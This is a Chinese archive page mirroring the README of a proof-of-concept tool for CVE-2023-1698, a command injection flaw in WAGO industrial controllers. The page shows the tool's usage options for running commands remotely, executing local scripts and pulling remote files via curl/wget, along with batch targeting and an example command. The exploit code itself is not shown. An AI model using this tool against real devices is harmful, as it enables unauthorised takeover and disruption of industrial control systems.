目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%

CVE-2023-1698 PoC — 多款WAGO产品操作系统命令注入漏洞

来源
关联漏洞
标题:多款WAGO产品操作系统命令注入漏洞 (CVE-2023-1698)
Description:WAGO PFC100等都是德国万可(WAGO)公司的产品。WAGO PFC100是一款可编程逻辑控制器(PLC)。WAGO Compact Controller CC100是一个紧凑型控制器。WAGO Edge Controller是一个边缘控制器。 WAGO Compact Controller CC100、Edge Controller、PFC100、PFC200、Touch Panel 600 Advanced Line、Touch Panel 600 Marine Line、Touch Pane
Description
WAGO系统远程代码执行漏洞(CVE-2023-1698)
介绍
# WAGO-CVE-2023-1698
WAGO系统远程代码执行漏洞(CVE-2023-1698)
## Attention
I have developed a tool for local testing and POC development, which is for technical learning reference only. Please do not use it for illegal purposes. Any direct or indirect consequences and losses caused by individuals or organizations using the information provided in this article are the responsibility of the user themselves and have nothing to do with the author!!!

![image](https://github.com/thedarknessdied/WAGO-CVE-2023-1698/assets/56123966/309f6b3f-9b59-43dc-b2a4-c413a55bf275)


## Description
WAGO is a company specializing in electrical interconnection, automation, and interface electronic technology. In multiple products of WAGO, a vulnerability allows unauthenticated remote attackers to create new users and change device configurations, which may lead to remote RCE, denial of service, and damage to the entire system.

## installation
> pip install -r requirements.txt

## Tools Usage
```python
python "WAGO-CVE-2023-1698 .py" -h
usage: WAGO-CVE-2023-1698 .py [-h] (-u URL | -f FILE)
                              [--remote-file-include REMOTE_FILE_INCLUDE | --local-file-include LOCAL_FILE_INCLUDE | --remote-command REMOTE_COMMAND]
                              [--random-agent RANDOM_AGENT] [-d DELAY] [-t THREAD] [--proxy PROXY] [--type TYPE] [-o OUTPUT]

WAGO System Remote Code Execution Vulnerability (CVE-2023-1698)

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Enter target object
  -f FILE, --file FILE  Input target object file
  --remote-file-include REMOTE_FILE_INCLUDE
                        Enter the filepath(it must be On the public network)
  --local-file-include LOCAL_FILE_INCLUDE
                        Enter the filepath(it must be On the local)
  --remote-command REMOTE_COMMAND
                        Enter the command you want to execute
  --random-agent RANDOM_AGENT
                        Using random user agents
  -d DELAY, --delay DELAY
                        Set multi threaded access latency (setting range from 0 to 5)
  -t THREAD, --thread THREAD
                        Set the number of program threads (setting range from 1 to 50)
  --proxy PROXY         Set up the proxy
  --type TYPE           Set up the remote upload file type
  -o OUTPUT, --output OUTPUT
                        output filename
```

## Params
>--remote-file-include,指定远程文件URL,会通过curl或者wget将文件上传到tmp目录或者当前目录, Specify a remote file URL, which will upload the file to the tmp directory or current directory through curl or wget
> --local-file-include,解析本地的shell脚本文件并在远端执行,Parse local shell script files and execute them remotely
>--remote-command REMOTE 执行一条系统命令,Execute a system command

## Example
>python wago.py -u ** --proxy http://127.0.0.1:10809 --remote-command "cat /var/log/wago"
文件快照

[4.0K] /data/pocs/9ec75b81910528df791d10f50b39ade52ec5400f ├── [1.0K] LICENSE ├── [2.9K] README.md ├── [ 18] requirements.txt ├── [3.2K] user_agent.py └── [ 11K] WAGO-CVE-2023-1698 .py 0 directories, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →